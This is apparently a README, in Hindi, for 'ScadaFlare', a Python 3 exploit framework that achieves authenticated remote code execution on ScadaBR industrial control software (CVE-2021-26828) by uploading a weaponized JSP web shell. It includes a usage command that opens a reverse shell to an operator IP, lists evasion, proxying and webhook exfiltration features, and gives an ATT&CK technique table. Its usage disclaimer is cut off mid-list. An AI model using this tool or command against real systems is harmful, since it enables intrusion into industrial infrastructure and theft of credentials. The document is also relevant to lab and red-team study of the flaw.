
ScadaBR (CVE-2021-26828) के लिए ScadaFlare प्रमाणित RCE एक्सप्लॉइट फ्रेमवर्क OpenPLC ScadaBR
ScadaBR <1.1.0 को लक्षित करने वाला एक मॉड्यूलर पोस्ट-प्रमाणीकरण RCE शोषण, रेड टीम ऑप्स के लिए उन्नत।

view_edit.shtm के माध्यम से weaponized .jsp शेल अपलोड करता हैयह शोषण HTB Pro Lab: Alchemy परिदृश्य के विश्लेषण के दौरान विकसित किया गया था। Fellipe Oliveira का मूल PoC ठोस था लेकिन:
Python 2 में लिखा गया था
प्रॉक्सी समर्थन, शेल क्लीनअप, एन्यूमरेशन चेनिंग जैसी आधुनिक सुविधाओं का अभाव था
रेड टीम वर्कफ़्लो में विस्तार या एकीकृत करना कठिन था
यह संस्करण, ScadaFlare, Python 3 में मॉड्यूलर समर्थन, कई चोरी रणनीतियों, OS डिटेक्शन ओवरराइड, webhook एकीकरण, SOCKS प्रॉक्सी समर्थन, और वास्तविक दुनिया के ऑपरेटर उपयोग के लिए एन्यूमरेशन चेन के साथ एक पूर्ण पुनर्लेखन है।
python3 scadaflare.py http://172.16.0.20:80 admin admin \
--reverse-ip 10.10.14.44 --reverse-port 4445 \
--verbose --cleanup
ScadaFlare को केवल के लिए डिज़ाइन किया गया है:
वास्तविक औद्योगिक प्रणालियों के विरुद्ध अनधिकृत उपयोग:
इस उपकरण का उपयोग करके आप पूर्ण जिम्मेदारी स्वीकार करते हैं:
MIT License – LICENSE देखें
| चरण | तकनीक | ID |
|---|
| प्रारंभिक पहुँच (पोस्ट-प्रमाणीकरण) | Valid Accounts | T1078 |
| निष्पादन | Exploit Public-Facing Application | T1190 |
| कमांड निष्पादन | Web Shell | T1505.003 |
| विशेषाधिकार क्रियाएँ | Modify Web Content | T1505 |
| क्रेडेंशियल एक्सेस | Credential in Configuration Files | T1552.001 |
| खोज | Remote System Discovery | T1018 |
| बाह्य निष्कासन | Exfiltration Over Web Service | T1567.002 |
| रक्षा चोरी | Proxy & Protocol Tunneling | T1090 |